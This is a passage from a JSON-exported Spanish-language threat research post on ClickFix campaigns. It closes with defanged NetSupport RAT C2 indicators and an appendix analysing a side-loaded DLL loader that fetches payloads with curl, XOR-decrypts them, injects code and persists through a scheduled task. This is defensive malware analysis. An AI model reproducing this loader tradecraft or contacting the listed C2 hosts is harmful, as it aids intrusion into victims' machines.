monospace;\">80.77.23[.]48<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">mhousecreative[.]com<\/span><\/li>\n<\/ul>\n<p>Ejemplo de dominios C2 de NetSupport RAT:<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">mh-sns[.]com<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">lasix20[.]com<\/span><\/li>\n<\/ul>\n<h2><a id=\"post-157571-_ypnylgyyfjhd\"><\/a>Recursos adicionales<\/h2>\n<ul>\n<li><a href=\"https:\/\/unit42.paloaltonetworks.com\/lampion-malware-clickfix-lures\/\" target=\"_blank\" rel=\"noopener\">Lampion vuelve con se\u00f1uelos ClickFix<\/a>: Unit\u00a042, Palo Alto Networks<\/li>\n<li><a href=\"https:\/\/x.com\/Unit42_Intel\/status\/1924866530195427372\" target=\"_blank\" rel=\"noopener\">Nueva actividad de ClickFix<\/a>: Unit\u00a042, Palo Alto Networks<\/li>\n<li><a href=\"https:\/\/www.cybereason.com\/blog\/threat-analysis-lummastealer-2.0\" target=\"_blank\" rel=\"noopener\">De la sombra al foco: La evoluci\u00f3n de Lumma Stealer y sus secretos ocultos<\/a>: CyberReason<\/li>\n<li><a href=\"https:\/\/www.esentire.com\/security-advisories\/netsupport-rat-clickfix-distribution\" target=\"_blank\" rel=\"noopener\">Distribuci\u00f3n de NetSupport RAT Clickfix<\/a>: Esentire<\/li>\n<li><a href=\"https:\/\/esentire.com\/security-advisories\/lumma-stealer-clickfix-distribution\" target=\"_blank\" rel=\"noopener\">Distribuci\u00f3n de Lumma Stealer ClickFix<\/a>: Esentire<\/li>\n<li><a href=\"https:\/\/www.cloudsek.com\/blog\/deepseek-clickfix-scam-exposed-protect-your-data-before-its-too-late?\" target=\"_blank\" rel=\"noopener\">\u00a1Estafa DeepSeek ClickFix al descubierto!<\/a>: NubeSEK<\/li>\n<li><a href=\"https:\/\/blog.sekoia.io\/clearfake-a-newcomer-to-the-fake-updates-threats-landscape\/\" target=\"_blank\" rel=\"noopener\">ClearFake: un reci\u00e9n llegado al panorama de las amenazas de \u201cactualizaciones falsas\u201d<\/a>: Sekoia<\/li>\n<li><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\" target=\"_blank\" rel=\"noopener\">Havoc: SharePoint con Microsoft Graph API se convierte en FUD C2<\/a>: Fortinet<\/li>\n<\/ul>\n<h2><a id=\"post-157571-_zctlzocvrsya\"><\/a>Ap\u00e9ndice: An\u00e1lisis t\u00e9cnico del nuevo cargador NetSupport RAT<\/h2>\n<p>Esta secci\u00f3n se ocupa del nuevo cargador de NetSupport RAT basado en DLL, que supone un reto mayor para los analistas que las campa\u00f1as anteriores. En el pasado, NetSupport RAT se cargaba mediante <a href=\"https:\/\/securelist.com\/horns-n-hooves-campaign-delivering-netsupport-rat\/114740\/\" target=\"_blank\" rel=\"noopener\">cargadores de scripts<\/a> con cadenas de infecci\u00f3n relativamente cortas, mientras que este cargador aporta un nivel de sigilo y complejidad al ataque.<\/p>\n<p>El ejemplo que analizamos aqu\u00ed se llama <span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/www.virustotal.com\/gui\/file\/cbaf513e7fd4322b14adcc34b34d793d79076ad310925981548e8d3cff886527\" target=\"_blank\" rel=\"noopener\">msvcp140.dll<\/a><\/span>. Este archivo DLL se carga lateralmente mediante un ejecutable leg\u00edtimo llamado <span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/www.virustotal.com\/gui\/file\/1fc684c5adf02b5a96cc407932429f1c2d3d2e78e3104cfbcf535a9de1ee4921\" target=\"_blank\" rel=\"noopener\">jp2launcher.exe<\/a>.<\/span><\/p>\n<p>Esta DLL utiliza varias t\u00e9cnicas para dificultar el an\u00e1lisis, como las siguientes:<\/p>\n<ul>\n<li>Resoluci\u00f3n din\u00e1mica de API<\/li>\n<li>Cifrado de datos<\/li>\n<li>Ofuscaci\u00f3n del c\u00f3digo<\/li>\n<\/ul>\n<p>Por ejemplo, despu\u00e9s de cargarse lateralmente con <span style=\"font-family: 'courier new', courier, monospace;\">jp2launcher.exe<\/span>, la DLL escribe el c\u00f3digo de sus siguientes etapas byte a byte en la pila. Despu\u00e9s, desofusca y ejecuta el c\u00f3digo.<\/p>\n<p>Despu\u00e9s de la desofuscaci\u00f3n inicial, la DLL recupera binarios cifrados llamados <span style=\"font-family: 'courier new', courier, monospace;\">data_3.bin<\/span> y <span style=\"font-family: 'courier new', courier, monospace;\">data_4.bin<\/span> del servidor C2 a trav\u00e9s de <span style=\"font-family: 'courier new', courier, monospace;\">curl.exe<\/span> y deposita las cargas \u00fatiles en el disco en el mismo directorio de trabajo. En la Figura\u00a013 se muestra la construcci\u00f3n del comando curl.exe para descargar una de las cargas \u00fatiles.<\/p>\n<figure id=\"attachment_157704\" aria-describedby=\"caption-attachment-157704\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157704 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-193704-157571-13.png\" alt=\"Captura de pantalla de HTML con resaltado de sintaxis en la que se muestran varios comandos como mov y push.\" width=\"1000\" height=\"97\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-193704-157571-13.png 1946w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-193704-157571-13-786x76.png 786w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-193704-157571-13-1920x185.png 1920w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-193704-157571-13-768x74.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-193704-157571-13-1536x148.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-157704\" class=\"wp-caption-text\">Figura 13. El cargador malicioso <span style=\"font-family: 'courier new', courier, monospace;\">msvcp140.dll<\/span> construye comandos <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span> para descargar archivos <span style=\"font-family: 'courier new', courier, monospace;\">.bin<\/span> mostrados en el depurador x64dbg.<\/figcaption><\/figure>\n<p>El cargador guarda tanto <span style=\"font-family: 'courier new', courier, monospace;\">data_3.bin<\/span> como <span style=\"font-family: 'courier new', courier, monospace;\">data_4.bin<\/span> en el disco como binarios cifrados, y luego los descifra en memoria con una clave XOR rodante, que es <span style=\"font-family: 'courier new', courier, monospace;\">https:\/\/google[.]com\/<\/span>. A continuaci\u00f3n, el cargador inyecta el c\u00f3digo descifrado en un proceso secundario de <span style=\"font-family: 'courier new', courier, monospace;\">jp2launcher.exe<\/span>.<\/p>\n<p>El c\u00f3digo descifrado de <span style=\"font-family: 'courier new', courier, monospace;\">data_4.bin<\/span> es un shellcode relativamente peque\u00f1o que carga c\u00f3digo descifrado de <span style=\"font-family: 'courier new', courier, monospace;\">data_3.bin<\/span>. Este binario es un PE completamente formado que descarga el paquete final de NetSupport RAT como un archivo ZIP desde el servidor C2 del atacante y lo descomprime en memoria. En la Figura\u00a014 se muestra la petici\u00f3n del cargador a <span style=\"font-family: 'courier new', courier, monospace;\">hxxp[:]\/\/80.77.23[.]48\/service\/settings\/5702b2a25802ff1b520c0d1e388026f8074e836d4e69c10f9481283f886fd9f4<\/span>. La solicitud contiene un agente de usuario \u00fanico.<\/p>\n<figure id=\"attachment_157715\" aria-describedby=\"caption-attachment-157715\" style=\"width: 1007px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157715 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-196847-157571-14.png\" alt=\"Captura de pantalla de un registro inform\u00e1tico que detalla las peticiones del servidor HTTP con marcas de tiempo y las respuestas del servidor.\" width=\"1007\" height=\"157\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-196847-157571-14.png 1007w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-196847-157571-14-786x123.png 786w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-196847-157571-14-768x120.png 768w\" sizes=\"(max-width: 1007px) 100vw, 1007px\" \/><figcaption id=\"caption-attachment-157715\" class=\"wp-caption-text\">Figura\u00a014. Solicitud de descarga de <span style=\"font-family: 'courier new', courier, monospace;\">jp2launcher.exe<\/span> desde C2, que descarga <span style=\"font-family: 'courier new', courier, monospace;\">client32.exe.<\/span><\/figcaption><\/figure>\n<p>La carga \u00fatil final es un archivo ZIP que contiene NetSupport RAT y todas sus dependencias necesarias. El cargador coloca la NetSupport RAT en <span style=\"font-family: 'courier new', courier, monospace;\">C:\\ProgramData\\SecurityCheck_v1\\<\/span> y ejecuta su binario principal, <span style=\"font-family: 'courier new', courier, monospace;\">client32.exe<\/span>.<\/p>\n<p>A continuaci\u00f3n, el cargador establece la persistencia de la RAT mediante la creaci\u00f3n de una tarea programada que ejecuta <span style=\"font-family: 'courier new', courier, monospace;\">client32.exe<\/span> cada vez que un usuario inicia sesi\u00f3n.<\/p>\n<p>En el proceso de an\u00e1lisis est\u00e1tico del cargador, observamos una ruta PDB \u00fanica, lo que indica que esta DLL forma parte de una determinada serie de herramientas MsiShell. Al recorrer este camino, encontramos otra instancia de la campa\u00f1a. En este caso utiliz\u00f3 un software leg\u00edtimo de transferencia de archivos, <span style=\"font-family: 'courier new', courier, monospace;\">filezilla.exe<\/span> y carg\u00f3 lateralmente otra versi\u00f3n del cargador, <span style=\"font-family: 'courier new', courier, monospace;\">libsqlite3-0.dll<\/span>. En la Figura\u00a015 se muestra la similitud entre las rutas PDB de las dos versiones del cargador.<\/p>\n<figure id=\"attachment_157726\" aria-describedby=\"caption-attachment-157726\" style=\"width: 800px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157726 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-199602-157571-15.png\" alt=\"Dos capturas de pantalla en las que se muestran las rutas de los archivos y los GUID de los proyectos de software, ambos son artefactos de depuraci\u00f3n. Cada elemento se resalta en rojo.\" width=\"800\" height=\"215\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-199602-157571-15.png 1030w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-199602-157571-15-786x211.png 786w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-199602-157571-15-768x207.png 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><figcaption id=\"caption-attachment-157726\" class=\"wp-caption-text\">Figura 15. Rutas PDB de ambas versiones del cargador de NetSupport RAT.<\/figcaption><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Las campa\u00f1as ClickFix van en aumento. Destacamos tres que distribuyeron el malware NetSupport RAT, Latrodectus y Lumma Stealer.<\/p>\n","protected":false},"author":366,"featured_media":145730,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[8838,8793],"tags":[9539,9450,9452,9540,9222,8883,9541],"product_categories":[8922,8924,8925,8921,8932,8934,8935,8890],"coauthors":[9304,8870],"class_list":["post-157571","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-threat-research-es-la","category-malware-es-la","tag-autoit-es-la","tag-clickfix-es-la","tag-lumma-stealer-es-la","tag-malvertising-es-la","tag-remote-access-trojan-es-la","tag-social-engineering-es-la","tag-typosquatting-es-la","product_categories-advanced-dns-security-es-la","product_categories-advanced-url-filtering-es-la","product_categories-advanced-wildfire-es-la","product_categories-cloud-delivered-security-services-es-la","product_categories-cortex-es-la","product_categories-cortex-xdr-es-la","product_categories-cortex-xsiam-es-la","product_categories-unit-42-incident-response-es-la"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Arregla el clic: Prevenci\u00f3n del vector de ataque ClickFix<\/title>\n<meta name=\"description\" content=\"Las campa\u00f1as ClickFix van en aumento. Destacamos tres que distribuyeron el malware NetSupport RAT, Latrodectus y Lumma Stealer.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/\" \/>\n<meta property=\"og:locale\" content=\"es_LA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Arregla el clic: Prevenci\u00f3n del vector de ataque ClickFix\" \/>\n<meta property=\"og:description\" content=\"Las campa\u00f1as ClickFix van en aumento. Destacamos tres que distribuyeron el malware NetSupport RAT, Latrodectus y Lumma Stealer.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-10T14:58:52+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-09-17T18:28:26+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/11_Cybercrime_Category_1920x900.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Rem Dudas, Noa Dekel\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Arregla el clic: Prevenci\u00f3n del vector de ataque ClickFix","description":"Las campa\u00f1as ClickFix van en aumento. Destacamos tres que distribuyeron el malware NetSupport RAT, Latrodectus y Lumma Stealer.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/","og_locale":"es_LA","og_type":"article","og_title":"Arregla el clic: Prevenci\u00f3n del vector de ataque ClickFix","og_description":"Las campa\u00f1as ClickFix van en aumento. Destacamos tres que distribuyeron el malware NetSupport RAT, Latrodectus y Lumma Stealer.","og_url":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/","og_site_name":"Unit 42","article_published_time":"2025-07-10T14:58:52+00:00","article_modified_time":"2025-09-17T18:28:26+00:00","og_image":[{"width":1920,"height":900,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/11_Cybercrime_Category_1920x900.jpg","type":"image\/jpeg"}],"author":"Rem Dudas, Noa Dekel","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/"},"author":{"name":"Sheida Azimi","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7ee97ec6f224446d57c0383eb5fd3639"},"headline":"Arregla el clic: Prevenci\u00f3n del vector de ataque ClickFix","datePublished":"2025-07-10T14:58:52+00:00","dateModified":"2025-09-17T18:28:26+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/"},"wordCount":4855,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/11_Cybercrime_Category_1920x900.jpg","keywords":["AutoIT","ClickFix","Lumma Stealer","malvertising","Remote Access Trojan","social engineering","typosquatting"],"articleSection":["Investigaci\u00f3n de amenazas","Malware"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/","url":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/","name":"Arregla el clic: Prevenci\u00f3n del vector de ataque ClickFix","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/11_Cybercrime_Category_1920x900.jpg","datePublished":"2025-07-10T14:58:52+00:00","dateModified":"2025-09-17T18:28:26+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7ee97ec6f224446d57c0383eb5fd3639"},"description":"Las campa\u00f1as ClickFix van en aumento. Destacamos tres que distribuyeron el malware NetSupport RAT, Latrodectus y Lumma Stealer.","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/#primaryimage","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/11_Cybercrime_Category_1920x900.jpg","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/11_Cybercrime_Category_1920x900.jpg","width":1920,"height":900,"caption":"Pictorial representation of a ClickFix campaign. A glowing, red padlock illuminated with light particles, set against a dark, rainy backdrop."},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/"},{"@type":"ListItem","position":2,"name":"Arregla el clic: Prevenci\u00f3n del vector de ataque ClickFix"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7ee97ec6f224446d57c0383eb5fd3639","name":"Sheida Azimi","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/4ffb3c2d260a0150fb91b3715442f8b3","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Sheida Azimi"},"url":"https:\/\/unit42.paloaltonetworks.com\/es-la\/author\/sheida-azimi\/"}]}},"_links":{"self":[{"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/posts\/157571","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/users\/366"}],"replies":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/comments?post=157571"}],"version-history":[{"count":3,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/posts\/157571\/revisions"}],"predecessor-version":[{"id":157800,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/posts\/157571\/revisions\/157800"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/media\/145730"}],"wp:attachment":[{"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/media?parent=157571"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/categories?post=157571"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/tags?post=157571"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/product_categories?post=157571"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/coauthors?post=157571"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}